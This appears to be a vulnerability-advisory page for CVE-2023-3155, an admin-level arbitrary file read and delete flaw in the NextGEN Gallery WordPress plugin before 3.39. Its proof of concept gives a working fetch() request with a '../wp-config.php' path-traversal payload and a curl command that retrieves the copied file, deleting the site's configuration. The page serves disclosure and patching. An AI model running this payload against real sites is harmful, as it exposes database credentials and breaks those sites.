Lucene search
Linwz from DEVCOREWPEX-ID:5C8473F4-4B52-430B-9140-B81B0A0901DAHistorySep 25, 2023 - 12:00 a.m.
NextGEN Gallery < 3.39 - Admin+ Arbitrary File Read and Delete
2023-09-2500:00:00
Linwz from DEVCORE
25
arbitrary file read
admin credentials
security exploit
file deletion
web security
0.001 Low
EPSS
Percentile
19.4%
Description The plugin is vulnerable to Arbitrary File Read and Delete due to a lack of input parameter validation in the gallery_edit function, allowing an attacker to access arbitrary resources on the server.
1. Create a Gallery called "My Gallery" and note its ID.
2. Run the following code in your browser, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.
await (await fetch("/index.php", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"name":"x","type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"name":"x","image_list":[{"path":"../wp-config.php","filename":"xxxxxxx.jpg"}]}}]&extra_data={}',
"method": "POST",
"mode": "cors"
})).text();
3. Download the file contents with the following `curl` command:
curl http://SITE_URL/wp-content/gallery/my-gallery/xxxxxxx.jpg
4. Note that the `wp-config.php` file has been deleted.Related
wpvulndb
wpvulndb
NextGEN Gallery < 3.39 - Admin+ Arbitrary File Read and Delete
2023-09-25 00:00:00
nvd
nvd
CVE-2023-3155
2023-10-16 20:15:14
cve
cve
CVE-2023-3155
2023-10-16 20:15:14
prion
prion
Design/Logic Flaw
2023-10-16 20:15:00
cvelist
cvelist
CVE-2023-3155 NextGEN Gallery < 3.39 - Admin+ Arbitrary File Read and Delete
2023-10-16 19:39:07
openvas
openvas
WordPress NextGEN Gallery Plugin < 3.39 Multiple Vulnerabilities
2023-10-18 00:00:00
wordfence
wordfence